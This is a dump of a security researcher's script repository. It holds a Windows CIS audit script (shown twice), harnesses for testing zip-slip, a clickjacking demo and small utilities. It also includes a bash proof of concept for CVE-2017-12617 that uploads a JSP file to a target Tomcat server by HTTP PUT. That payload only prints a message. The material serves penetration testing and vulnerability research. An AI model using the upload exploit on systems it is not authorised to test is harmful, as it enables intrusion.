 59 | "Appropiate Events Audited"
 60 | auditpol /get /category:*
 61 | "Failsafe if Security Events Unable To Be Audited"
 62 | reg query HKLM\System\CurrentControlSet\Control\Lsa /v crashonauditfail
 63 | 
 64 | 
 65 | 
 66 | "----------------------------------------"
 67 | "System Logging"
 68 | "----------------------------------------"
 69 | 
 70 | "Checking if EventLog is configured...but check GPO First"
 71 | HKLM\Software\Policies\Microsoft\Windows\EventLog\Application\MaxSize
 72 | HKLM\Software\Policies\Microsoft\Windows\EventLog\Security\MaxSize
 73 | HKLM\Software\Policies\Microsoft\Windows\EventLog\System\MaxSize
 74 | 
 75 | 
 76 | "Checking if locally configured value is used"
 77 | REG QUERY HKLM\SYSTEM\CurrentControlSet\services\eventlog\Application\MaxSize
 78 | 
 79 | 
 80 | "These policy settings are backed up by the following registry values:"
 81 | REG QUERY HKLM\Software\Policies\Microsoft\Windows\EventLog\Application\Retention
 82 | REG QUERY HKLM\Software\Policies\Microsoft\Windows\EventLog\Security\Retention
 83 | REG QUERY HKLM\Software\Policies\Microsoft\Windows\EventLog\System\Retention
 84 | 
 85 | "If there is no group policy then the following registry values take precedence"
 86 | REG QUERY HKLM\SYSTEM\CurrentControlSet\services\eventlog\Security\Retention
 87 | REG QUERY HKLM\SYSTEM\CurrentControlSet\services\eventlog\System\Retention
 88 | REG QUERY HKLM\SYSTEM\CurrentControlSet\services\eventlog\Application\Retention
 89 | 
 90 | 
 91 | 
 92 | "----------------------------------------"
 93 | "Firewall State"
 94 | 
 95 | "----------------------------------------"
 96 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v EnableFirewall
 97 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v EnableFirewall
 98 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v EnableFirewall
 99 | netsh advfirewall show allprofiles
100 | 
101 | 
102 | "Firewall Notifications: They should all be 0, meaning notifications are enabled."
103 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v DisableNotifications
104 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v DisableNotifications
105 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v DisableNotifications
106 | 
107 | "Windows Server 2012: These settings control whether local administrators are allowed to create connection security rules that apply together with connection security rules configured by Group Policy."
108 | 
109 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v AllowLocalIPsecPolicyMerge
110 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v AllowLocalIPsecPolicyMerge
111 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v AllowLocalIPsecPolicyMerge
112 | 
113 | "These determine whether locally set firewall rules will be permitted. Otherwise, only those that are set by Group Policy will be permitted."
114 | 
115 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v AllowLocalPolicyMerge
116 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v AllowLocalPolicyMerge
117 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v AllowLocalPolicyMerge
118 | 
119 | "Firewall Rules: review manually"
120 | netsh advfirewall firewall show rule name=all
121 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v DefaultOutboundAction
122 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v DefaultOutboundAction
123 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v DefaultOutboundAction
124 | 
125 | "Inbound Connections"
126 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v DefaultInboundAction
127 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v DefaultInboundAction
128 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v DefaultInboundAction
129 | 
130 | 
131 | 
132 | 
133 | 
134 | 
135 | 
136 | 
137 | 
138 | "----------------------------------------"
139 | "Screensaver Security, Default is not found"
140 | 
141 | "----------------------------------------"
142 | 
143 | 
144 | 
145 | "Interactive logon: Machine inactivity limit. Default is disabled"
146 | REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v InactivityTimeoutSecs
147 | 
148 | 
149 | "Checking screensaver, probs not configued"
150 | REG QUERY HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop\ScreenSaveActive
151 | 
152 | 
153 | "See if screensaver executable is present"
154 | REG QUERY HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop\SCRNSAVE.EXE 
155 | "Screensaver timeout"
156 | REG QUERY HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop\ScreenSaveTimeOut 
157 | 
158 | "Password protect the screen saver"
159 | REG QUERY HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop\ScreenSaverIsSecure 
160 | 
161 | 
162 | "RDP Security"
163 | "Check if password security is disabled"
164 | REG QUERY "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\DisablePasswordSaving"
165 | REG QUERY "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\fPromptForPassword"
166 | 
167 | 
168 | "----------------------------------------"
169 | "Remote Desktop Encryption"
170 | "----------------------------------------"
171 | 
172 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel
173 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer
174 | 
175 | "----------------------------------------"
176 | "UAC"
177 | "----------------------------------------"
178 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken
179 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
180 | 
181 | "----------------------------------------"
182 | "wsus"
183 | "----------------------------------------"
184 | reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\ /v WUServer
185 | 
186 | 
187 | 
188 | 
189 | "----------------------------------------"
190 | "Insecure Interactive Logon Settings"
191 | 
192 | "----------------------------------------"
193 | reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v crashonauditfail
194 | reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v ForceUnlockLogon
195 | reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CachedLogonsCount
196 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v LegalNoticeText
197 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v LegalNoticeCaption
198 | 
199 | 
200 | "----------------------------------------"
201 | "Insecure Network Access Controls And Configuration"
202 | "----------------------------------------"
203 | reg query HKLM\System\CurrentControlSet\Control\Lsa /v RestrictAnonymous
204 | reg query HKLM\System\CurrentControlSet\Control\Lsa /v DisableDomainCreds
205 | reg query HKLM\System\CurrentControlSet\Control\Lsa\MSV1_0 /v NtlmMinClientSec
206 | reg query HKLM\System\CurrentControlSet\Control\Lsa\MSV1_0 /v NtlmMinServerSec
207 | 
208 | 
209 | "----------------------------------------"
210 | "Insecure Startup Settings, Registry should not be set"
211 | "----------------------------------------"
212 | 
213 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableLocalMachineRun
214 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableLocalMachineRunOnce
215 | 
216 | 
217 | "----------------------------------------"
218 | "Insecure SMB Settings"
219 | "----------------------------------------"
220 | reg query HKLM\System\CurrentControlSet\Services\LanmanWorkstation\Parameters /v RequireSecuritySignature
221 | reg query HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters /v EnableSecuritySignature
222 | reg query HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters /v RequireSecuritySignature
223 | 
224 | 
225 | 
226 | 
227 | 
228 | 
229 | 
230 | 
231 | "----------------------------------------"
232 | "Checking for Null Sessions"
233 | "----------------------------------------"
234 | REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters /v restrictnullsessaccess
235 | 
236 | 
237 | }


--------------------------------------------------------------------------------
/Scripts and pocs/CVE-2017-12617.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # to use, type sh CVE-2017-12617.sh and give a URL when prompted
 3 | # https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
 4 | 
 5 | echo Give the target sites URL
 6 | read urlname
 7 | echo 'Creating test exploit'
 8 | echo ''
 9 | echo ''
10 | echo ''
11 | echo "<% out.write(\"<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>\"); %>" > exploit.jsp 
12 | echo trying to upload exploit.jsp to the given URL
13 | request=$(curl -X PUT $urlname/exploit.jsp -d @- < exploit.jsp)
14 | echo 'Printing Response...'
15 | echo ''
16 | echo ''
17 | echo ''
18 | echo $request
19 | echo ''
20 | echo ''
21 | echo ''
22 | echo ''
23 | echo "Check if your file is uploaded by browsing to the target address or: curl http://$urlname/exploit.jsp"
24 | 


--------------------------------------------------------------------------------
/Scripts and pocs/Clickjacking poc.html:
--------------------------------------------------------------------------------
 1 | <pre lang="JavaScript" line="1">
 2 | <html>
 3 | <head>
 4 | <title>ClickJacking PoC</title>
 5 | </head>
 6 | ClickJacking PoC
 7 | <h2>Your Web Application Can be Mounted within an iFrame which makes it vulnerable to ClickJacking!</h2>
 8 | <iframe src="https://ADDURLHERE/" height="450" width="1000"></iframe>
 9 | </body>
10 | </html>
11 | </pre>
12 | 


--------------------------------------------------------------------------------
/Scripts and pocs/Elibyy-Zip.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require 'vendor/autoload.php';
 3 | 
 4 | use Elibyy\Reader;
 5 | use Elibyy\Creator;
 6 | 
 7 | 
 8 | $reader = new Reader('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/zip-slip.zip');
 9 | $reader->unzip('/home/snoopy/zipslip/uploads');
10 | 
11 | 
12 | //https://mega.nz/#F!Qo9hgASA!HaOtbRwm18QhgApGfu6tqQ


--------------------------------------------------------------------------------
/Scripts and pocs/URlSchemes.txt:
--------------------------------------------------------------------------------
  1 | URI Scheme
  2 | aaa
  3 | aaas
  4 | about
  5 | acap
  6 | acct
  7 | acr
  8 | adiumxtra
  9 | afp
 10 | afs
 11 | aim
 12 | appdata
 13 | apt
 14 | attachment
 15 | aw
 16 | barion
 17 | beshare
 18 | bitcoin
 19 | blob
 20 | bolo
 21 | callto
 22 | cap
 23 | chrome
 24 | chrome-extension
 25 | cid
 26 | coap
 27 | coaps
 28 | com-eventbrite-attendee
 29 | content
 30 | crid
 31 | cvs
 32 | data
 33 | dav
 34 | dict
 35 | dis
 36 | dlna-playcontainer
 37 | dlna-playsingle
 38 | dns
 39 | dntp
 40 | dtn
 41 | dvb
 42 | ed2k
 43 | example
 44 | facetime
 45 | fax
 46 | feed
 47 | feedready
 48 | file
 49 | filesystem
 50 | finger
 51 | fish
 52 | ftp
 53 | geo
 54 | gg
 55 | git
 56 | gizmoproject
 57 | go
 58 | gopher
 59 | gtalk
 60 | h323
 61 | ham
 62 | hcp
 63 | http
 64 | https
 65 | iax
 66 | icap
 67 | icon
 68 | im
 69 | imap
 70 | info
 71 |       [RFC4452] (section 3) defines an ""info"" registry 
 72 |         of public namespaces
 73 |         from [http://info-uri.info/]."
 74 | iotdisco
 75 | ipn
 76 | ipp
 77 | ipps
 78 | irc
 79 | irc6
 80 | ircs
 81 | iris
 82 | iris.beep
 83 | iris.lwz
 84 | iris.xpc
 85 | iris.xpcs
 86 | isostore
 87 | itms
 88 | jabber
 89 | jar
 90 | jms
 91 | keyparc
 92 | lastfm
 93 | ldap
 94 | ldaps
 95 | magnet
 96 | mailserver
 97 | mailto
 98 | maps
 99 | market
100 | message
101 | mid
102 | mms
103 | modem
104 | ms-access
105 | ms-browser-extension
106 | ms-drive-to
107 | ms-enrollment
108 | ms-excel
109 | ms-getoffice
110 | ms-help
111 | ms-infopath
112 | ms-media-stream-id
113 | ms-project
114 | ms-powerpoint
115 | ms-publisher
116 | ms-search-repair
117 | ms-secondary-screen-controller
118 | ms-secondary-screen-setup
119 | ms-settings
120 | ms-settings-airplanemode
121 | ms-settings-bluetooth
122 | ms-settings-camera
123 | ms-settings-cellular
124 | ms-settings-cloudstorage
125 | ms-settings-connectabledevices
126 | ms-settings-displays-topology
127 | ms-settings-emailandaccounts
128 | ms-settings-language
129 | ms-settings-location
130 | ms-settings-lock
131 | ms-settings-nfctransactions
132 | ms-settings-notifications
133 | ms-settings-power
134 | ms-settings-privacy
135 | ms-settings-proximity
136 | ms-settings-screenrotation
137 | ms-settings-wifi
138 | ms-settings-workplace
139 | ms-spd
140 | ms-transit-to
141 | ms-visio
142 | ms-walk-to
143 | ms-word
144 | msnim
145 | msrp
146 | msrps
147 | mtqp
148 | mumble
149 | mupdate
150 | mvn
151 | news
152 | nfs
153 | ni
154 | nih
155 | nntp
156 | notes
157 | oid
158 | opaquelocktoken
159 | pack
160 | palm
161 | paparazzi
162 | pkcs11
163 | platform
164 | pop
165 | pres
166 | prospero
167 | proxy
168 | psyc
169 | query
170 | redis
171 | rediss
172 | reload
173 | res
174 | resource
175 | rmi
176 | rsync
177 | rtmfp
178 | rtmp
179 | rtsp
180 | rtsps
181 | rtspu
182 | secondlife
183 | service
184 | session
185 | sftp
186 | sgn
187 | shttp
188 | sieve
189 | sip
190 | sips
191 | skype
192 | smb
193 | sms
194 | smtp
195 | snews
196 | snmp
197 | soap.beep
198 | soap.beeps
199 | soldat
200 | spotify
201 | ssh
202 | steam
203 | stun
204 | stuns
205 | submit
206 | svn
207 | tag
208 | teamspeak
209 | tel
210 | teliaeid
211 | telnet
212 | tftp
213 | things
214 | thismessage
215 | tip
216 | tn3270
217 | tool
218 | turn
219 | turns
220 | tv
221 | udp
222 | unreal
223 | urn
224 | ut2004
225 | v-event
226 | vemmi
227 | ventrilo
228 | videotex
229 | vnc
230 | view-source
231 | wais
232 | webcal
233 | wpid
234 | ws
235 | wss
236 | wtai
237 | wyciwyg
238 | xcon
239 | xcon-userid
240 | xfire
241 | xmlrpc.beep
242 | xmlrpc.beeps
243 | xmpp
244 | xri
245 | ymsgr
246 | z39.50
247 | z39.50r
248 | z39.50s
249 | 


--------------------------------------------------------------------------------
/Scripts and pocs/alchemy_zippy.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | use Alchemy\Zippy\Zippy;
 4 | 
 5 | // Require Composer's autoloader
 6 | require __DIR__ . '/vendor/autoload.php';
 7 | $zippy = Zippy::load();
 8 | // Open an archive
 9 | $archive = $zippy->open('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/zip-slip.zip');
10 | 
11 | // Extract archive contents to `/tmp`
12 | $archive->extract('/home/snoopy/zipslip/uploads');
13 | 


--------------------------------------------------------------------------------
/Scripts and pocs/bapp_store_scraper.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import time
 3 | from datetime import datetime, timedelta
 4 | import requests
 5 | from bs4 import BeautifulSoup
 6 | 
 7 | BApp_URL = "https://portswigger.net/bappstore"
 8 | awesome_extension_url = "https://github.com/snoopysecurity/awesome-burp-extensions/blob/master/README.md"
 9 | awesome_burp_list = []
10 | bapp_store_list = []
11 | 
12 | def _get_soup(url):
13 |     """
14 |     Sends a request to a provided URL and returns beautiful soup parsed content
15 |     """
16 |     response = requests.get(url)
17 |     return BeautifulSoup(response.content, "html.parser")
18 | 
19 | 
20 | def awesome_burp_list_parse():
21 |     print "[+] Fetching Extension List from Awesome Burp Extensions List"
22 |     soup = _get_soup(awesome_extension_url)
23 |     awesome_burp_list_titles = ["scanners","custom-features","beautifiers-and-decoders","cloud-security","scripting","oauth-and-sso","information-gathering","vulnerability-specific-extensions","cross-site-scripting","server-side-request-forgery","broken-access-control","cross-site-request-forgery","deserialization","sensitive-data-exposure","sql-injection","xxe","insecure-file-uploads","directory-traversal","session-management","command-injection","template-injection","web-application-firewall-evasion","logging-and-notes","payload-generators-and-fuzzers","cryptography","web-services","tool-integration","misc"]
24 |     for list_heading in awesome_burp_list_titles:
25 |       for url_heading in soup.find_all("a", {"id": "user-content-" + str(list_heading)}):
26 |         tbl = url_heading.find_next("ul")
27 |         for link in tbl.findAll('a'):
28 |           awesome_burp_list.append(link.text)
29 | 
30 | def bapp_store_scrape():
31 |     print "[+] Fetching Extension List from PortSwigger BApp Store"
32 |     soup = _get_soup(BApp_URL)
33 |     for url_heading in soup.find_all("a", {"class": "bapp-label"}):
34 |       bapp_store_list.append(url_heading.text)
35 | 
36 | def main():
37 |     awesome_burp_list_parse()
38 |     bapp_store_scrape()
39 |     extension_result = set(bapp_store_list) - set(awesome_burp_list)
40 |     print '[+] List of extensions missing from Awesome Burp Extension List'
41 |     print sorted(extension_result)
42 | 
43 | 
44 | 
45 | 
46 | 
47 | if __name__ == "__main__":
48 |     main()
49 | 


--------------------------------------------------------------------------------
/Scripts and pocs/bluemonday_server.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	"log"
 5 | 	"net/http"
 6 | 
 7 | 	"github.com/microcosm-cc/bluemonday"
 8 | )
 9 | 
10 | func main() {
11 | 
12 | 	http.HandleFunc("/", handler)
13 | 	http.ListenAndServe(":8080", nil)
14 | }
15 | 
16 | func handler(w http.ResponseWriter, r *http.Request) {
17 | 	p := bluemonday.UGCPolicy()
18 | 	keys, ok := r.URL.Query()["key"]
19 | 
20 | 	if !ok || len(keys[0]) < 1 {
21 | 		log.Println("Url Param 'key' is missing")
22 | 		return
23 | 	}
24 | 
25 | 	// Query()["key"] will return an array of items,
26 | 	// we only want the single item.
27 | 	key := keys[0]
28 | 	w.Write([]byte(`
29 |     <!doctype html>
30 |     <html>
31 |       <head>
32 |         <title>This is the title of the webpage!</title>
33 |       </head>
34 |       <body>
35 |       `))
36 | 	w.Write([]byte("Url Param 'key' is: " + p.Sanitize(string(key))))
37 | 	w.Write([]byte(`
38 |     </body>
39 |     </html>
40 |       `))
41 | 	log.Println("Url Param 'key' is: " + string(key))
42 | }
43 | 


--------------------------------------------------------------------------------
/Scripts and pocs/burpstarter.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash 
2 | launch=echo java -jar -Xmx3g `ls . | grep 'burpsuite_pro_v1.7.0' | sort -r | head -n 1` 
3 | echo $launch &
4 | firefox
5 | 
6 | 


--------------------------------------------------------------------------------
/Scripts and pocs/cis-checks.ps1:
--------------------------------------------------------------------------------
  1 | function enumeration
  2 | {
  3 |   # List OS Version
  4 |   systeminfo | findstr /B /C:"OS Name" /C:"OS Version"  
  5 |   # Hostname of the System
  6 |   hostname  
  7 |   # List all services
  8 |   Get-WmiObject -Class win32_service
  9 |   # List all users
 10 |   net users
 11 |   # Available Network Interfaces and route
 12 |   ipconfig /all
 13 |   route print
 14 |   arp -A
 15 |   # Active network connections
 16 |   netstat -ano
 17 |   netsh firewall show state
 18 |   netsh firewall show config
 19 |   # Show all scheduled tasks
 20 |   schtasks /query /fo LIST /v
 21 |   # Show services and process IDs
 22 |   tasklist /SVC
 23 |   netstart
 24 |   # Show 3rd Party Drivers
 25 |   DRIVERQUERY
 26 | }
 27 | 
 28 | function patches
 29 | {
 30 |   get-hotfix | select Caption,Description,HotFixID,InstalledOn
 31 |   
 32 | }
 33 | 
 34 | function cis-checks
 35 | {
 36 | 
 37 | "----------------------------------------"
 38 | "Password Policy checks, "
 39 | "----------------------------------------"
 40 | "net accounts"
 41 | net accounts
 42 | "REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Network" 
 43 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Network 
 44 | "REG QUERY HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters"
 45 | REG QUERY HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters 
 46 | "Passwords Should Be Stored Securely"
 47 | "REG QUERY HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel"
 48 | REG QUERY HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel
 49 | "Checking if Account Lockout Registry is set"
 50 | "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters\AccountLockout"
 51 | REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters\AccountLockout
 52 | 
 53 | "----------------------------------------"
 54 | "Account auditing"
 55 | "----------------------------------------"
 56 | "User Logons and Logoffs Audited"
 57 | auditpol /get /subcategory:"Logoff"
 58 | auditpol /get /subcategory:"Logon"
 59 | "Appropiate Events Audited"
 60 | auditpol /get /category:*
 61 | "Failsafe if Security Events Unable To Be Audited"
 62 | reg query HKLM\System\CurrentControlSet\Control\Lsa /v crashonauditfail
 63 | 
 64 | 
 65 | 
 66 | "----------------------------------------"
 67 | "System Logging"
 68 | "----------------------------------------"
 69 | 
 70 | "Checking if EventLog is configured...but check GPO First"
 71 | HKLM\Software\Policies\Microsoft\Windows\EventLog\Application\MaxSize
 72 | HKLM\Software\Policies\Microsoft\Windows\EventLog\Security\MaxSize
 73 | HKLM\Software\Policies\Microsoft\Windows\EventLog\System\MaxSize
 74 | 
 75 | 
 76 | "Checking if locally configured value is used"
 77 | REG QUERY HKLM\SYSTEM\CurrentControlSet\services\eventlog\Application\MaxSize
 78 | 
 79 | 
 80 | "These policy settings are backed up by the following registry values:"
 81 | REG QUERY HKLM\Software\Policies\Microsoft\Windows\EventLog\Application\Retention
 82 | REG QUERY HKLM\Software\Policies\Microsoft\Windows\EventLog\Security\Retention
 83 | REG QUERY HKLM\Software\Policies\Microsoft\Windows\EventLog\System\Retention
 84 | 
 85 | "If there is no group policy then the following registry values take precedence"
 86 | REG QUERY HKLM\SYSTEM\CurrentControlSet\services\eventlog\Security\Retention
 87 | REG QUERY HKLM\SYSTEM\CurrentControlSet\services\eventlog\System\Retention
 88 | REG QUERY HKLM\SYSTEM\CurrentControlSet\services\eventlog\Application\Retention
 89 | 
 90 | 
 91 | 
 92 | "----------------------------------------"
 93 | "Firewall State"
 94 | 
 95 | "----------------------------------------"
 96 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v EnableFirewall
 97 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v EnableFirewall
 98 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v EnableFirewall
 99 | netsh advfirewall show allprofiles
100 | 
101 | 
102 | "Firewall Notifications: They should all be 0, meaning notifications are enabled."
103 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v DisableNotifications
104 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v DisableNotifications
105 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v DisableNotifications
106 | 
107 | "Windows Server 2012: These settings control whether local administrators are allowed to create connection security rules that apply together with connection security rules configured by Group Policy."
108 | 
109 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v AllowLocalIPsecPolicyMerge
110 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v AllowLocalIPsecPolicyMerge
111 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v AllowLocalIPsecPolicyMerge
112 | 
113 | "These determine whether locally set firewall rules will be permitted. Otherwise, only those that are set by Group Policy will be permitted."
114 | 
115 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v AllowLocalPolicyMerge
116 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v AllowLocalPolicyMerge
117 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v AllowLocalPolicyMerge
118 | 
119 | "Firewall Rules: review manually"
120 | netsh advfirewall firewall show rule name=all
121 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v DefaultOutboundAction
122 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v DefaultOutboundAction
123 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v DefaultOutboundAction
124 | 
125 | "Inbound Connections"
126 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v DefaultInboundAction
127 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v DefaultInboundAction
128 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v DefaultInboundAction
129 | 
130 | 
131 | 
132 | 
133 | 
134 | 
135 | 
136 | 
137 | 
138 | "----------------------------------------"
139 | "Screensaver Security, Default is not found"
140 | 
141 | "----------------------------------------"
142 | 
143 | 
144 | 
145 | "Interactive logon: Machine inactivity limit. Default is disabled"
146 | REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v InactivityTimeoutSecs
147 | 
148 | 
149 | "Checking screensaver, probs not configued"
150 | REG QUERY HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop\ScreenSaveActive
151 | 
152 | 
153 | "See if screensaver executable is present"
154 | REG QUERY HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop\SCRNSAVE.EXE 
155 | "Screensaver timeout"
156 | REG QUERY HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop\ScreenSaveTimeOut 
157 | 
158 | "Password protect the screen saver"
159 | REG QUERY HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop\ScreenSaverIsSecure 
160 | 
161 | 
162 | "RDP Security"
163 | "Check if password security is disabled"
164 | REG QUERY "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\DisablePasswordSaving"
165 | REG QUERY "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\fPromptForPassword"
166 | 
167 | 
168 | "----------------------------------------"
169 | "Remote Desktop Encryption"
170 | "----------------------------------------"
171 | 
172 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel
173 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer
174 | 
175 | "----------------------------------------"
176 | "UAC"
177 | "----------------------------------------"
178 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken
179 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
180 | 
181 | "----------------------------------------"
182 | "wsus"
183 | "----------------------------------------"
184 | reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\ /v WUServer
185 | 
186 | 
187 | 
188 | 
189 | "----------------------------------------"
190 | "Insecure Interactive Logon Settings"
191 | 
192 | "----------------------------------------"
193 | reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v crashonauditfail
194 | reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v ForceUnlockLogon
195 | reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CachedLogonsCount
196 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v LegalNoticeText
197 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v LegalNoticeCaption
198 | 
199 | 
200 | "----------------------------------------"
201 | "Insecure Network Access Controls And Configuration"
202 | "----------------------------------------"
203 | reg query HKLM\System\CurrentControlSet\Control\Lsa /v RestrictAnonymous
204 | reg query HKLM\System\CurrentControlSet\Control\Lsa /v DisableDomainCreds
205 | reg query HKLM\System\CurrentControlSet\Control\Lsa\MSV1_0 /v NtlmMinClientSec
206 | reg query HKLM\System\CurrentControlSet\Control\Lsa\MSV1_0 /v NtlmMinServerSec
207 | 
208 | 
209 | "----------------------------------------"
210 | "Insecure Startup Settings, Registry should not be set"
211 | "----------------------------------------"
212 | 
213 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableLocalMachineRun
214 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableLocalMachineRunOnce
215 | 
216 | 
217 | "----------------------------------------"
218 | "Insecure SMB Settings"
219 | "----------------------------------------"
220 | reg query HKLM\System\CurrentControlSet\Services\LanmanWorkstation\Parameters /v RequireSecuritySignature
221 | reg query HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters /v EnableSecuritySignature
222 | reg query HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters /v RequireSecuritySignature
223 | 
224 | 
225 | 
226 | 
227 | 
228 | 
229 | 
230 | 
231 | "----------------------------------------"
232 | "Checking for Null Sessions"
233 | "----------------------------------------"
234 | REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters /v restrictnullsessaccess
235 | 
236 | 
237 | }
238 | 


--------------------------------------------------------------------------------
/Scripts and pocs/comodo.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require __DIR__ . '/vendor/autoload.php';
 3 | use \Comodojo\Zip\Zip;
 4 | 
 5 | 
 6 | 
 7 | $zip = Zip::open('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/zip-slip.zip');
 8 | $zip = $zip->extract('/home/snoopy/zipslip/uploads');
 9 | //$zip->close();
10 | 


--------------------------------------------------------------------------------
/Scripts and pocs/csrf from xss POC:
